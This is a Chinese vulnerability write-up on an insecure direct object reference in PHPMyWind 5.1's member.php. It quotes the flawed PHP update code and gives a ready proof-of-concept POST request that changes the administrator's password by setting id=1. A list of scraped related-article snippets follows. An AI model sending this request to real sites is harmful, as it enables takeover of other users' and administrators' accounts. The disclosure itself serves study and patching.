httpmember.php,PHPMyWind 5.1 /member.php 远程密码修改漏洞
- /member.php
//初始化参数
……
$id = isset($id) ? intval($id) : 0;
……
//更新资料
else if($a == 'saveedit')
{
//检测数据完整性
if($password!=$repassword or $email=='')
{
header('location:?c=edit');
exit();
}
//HTML转义变量
....
//检测旧密码是否正确
if($password != '')
{
$oldpassword = md5(md5($oldpassword));
$r = $dosql->GetOne("SELECT `password` FROM `#@__member` WHERE `username`='$c_uname'");
if($r['password'] != $oldpassword)
{
ShowMsg('抱歉,旧密码错误!','-1');
exit();
}
}
$sql = "UPDATE `#@__member` SET ";
if($password != '')
{
$password = md5(md5($password));
$sql .= "password='$password', ";
}
@$sql .= "question='$question', answer='$answer', cnname='$cnname', enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month', birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov', live_city='$live_city', live_country='$live_country', home_prov='$home_prov', home_city='$home_city', home_country='$home_country', cardtype='$cardtype', cardnum='$cardnum', intro='$intro', email='$email', qqnum='$qqnum', mobile='$mobile', telephone='$telephone', address_prov='$address_prov', address_city='$address_city', address_country='$address_country', address='$address', zipcode='$zipcode' WHERE id=$id";
if($dosql->ExecNoneQuery($sql))
{
ShowMsg('资料更新成功!','?c=edit');
exit();
}
}
此处$id为用户传入的id,在修改密码的时候未验证id是否为用户本身,造成可以修改任意用户的资料以及密码。
注册用户,密码为123123,登录。
发送数据包到:
http://10.211.55.3/phpmywind/member.php?e=saveedit
内容为:
oldpassword=123123&password=123123&repassword=123123&email=123%40asd.com&action=update&id=1
id为管理员的id,提示修改成功。
用123123登录admin帐号。
httpmember.php,PHPMyWind 5.1 /member.php 远程密码修改漏洞相关推荐
- mysql查看远程密码修改_MySQL如何修改密码并添加远程连接权限 | Visant-i 行客
一.最简单的方法 天天快3登入首页常规设置项,直接点击"修改密码"即可 二.服务器命令 修改密码命令: 1.如果你的root用户没有密码,那么修改命令是: mysqladmin - ...
- index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...
- oracle中间人投毒漏洞,Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的完美解决方法...
环境:Windows 2008 R2 + Oracle 10.2.0.3 应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server 'TNS Listener ...
- thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...
- ElasticSearch Groovy脚本远程代码执行漏洞
什么是ElasticSearch? 它是一种分布式的.实时性的.由JAVA开发的搜索和分析引擎. 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由 ...
- Linux包管理器apt/apt-get发现远程代码执行漏洞
研究人员Max Justicz日前发现了知名Linux包管理器apt/apt-get中的远程代码执行漏洞,该漏洞允许外部进行中间人攻击并获取root权限以执行任何代码.该漏洞已在最新版本apt修复,如 ...
- wordpress php执行短代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常 ...
- 和远程ip_漏洞Microsoft Windows TCP/IP 远程执行代码漏洞威胁通告
2020年10月14日,中测安华必达实验室技术团队依托监测平台第一时间发现微软公司(Microsoft)披露了Microsoft Windows TCP/IP 远程执行代码漏洞(CVE-2020-16 ...
- ImageMagick远程代码执行漏洞CVE-2016-8707 绿盟科技发布安全威胁通告
在 ImageMagicks 的转换实用程序中, TIFF 图像压缩处理存在一个写边界的问题.攻击者利用一个精心编制的 TIFF 文件,可以导致的界限写,特别是可以利用的情况下进入远程执行代码.任何用 ...
最新文章
- flask中的request
- Python数据分析工具:Pandas_Part 1
- golang json数据的处理 动态key 动态字段
- 谈谈AI的ToB市场,我的新书《B端产品经理修炼手册》正式出版
- android 如何实现无限列表,在Android中解析和创建无限/无限级别的List /子列表中的XML...
- 【转】ABAP BASE64编码与解码练习
- Redis大乱探------哨兵(二)
- makefile常用讲解(2)
- Redis(八):Zset有序集合数据类型详解
- 【很久之前的一篇老文章】一位程序员工作10年总结的13个忠告
- 产生数(信息学奥赛一本通-T1361)
- Amesim更改为中文
- 【资源篇】在线下载B站视频(免安装)
- POJ-2524 Ubiquitous Religions
- 苹果手机里的照片删了怎么恢复
- 2018程序员拜年的奇思妙想,涨姿势了
- ibm r50隐藏分区_网友经历:IBM R50本本内存升级手记
- 如何打开powershell 【超简单,一步完成】
- python初学者——1、变量
- JAVA语言发展介绍【尚学堂java300集视频学习笔记】
热门文章
- HI3861学习笔记(12)——GPIO输入接口使用
- 阿里巴巴CTO行癫:阿里双11是世界互联网技术的超级工程
- Adobe Photoshop(Ps)2023软件安装包下载及安装教程(mac+windows多版PS软件) 超级丰富的!
- java seo优化_JavaWeb 项目如果从技术选型的角度来做 Seo 优化
- 百度搜索结果页面的参数 搜索历史记录(rsv_sug)
- mysql定时任务每天凌晨三点钟醒来_linux cron 下的定时执行工具使用技巧
- Pandas中透视表和交叉表
- 基于内容推荐算法html,基于内容的互联网推荐算法
- 唐巧:技术人如何成为管理者
- ADAMS中转动整个模型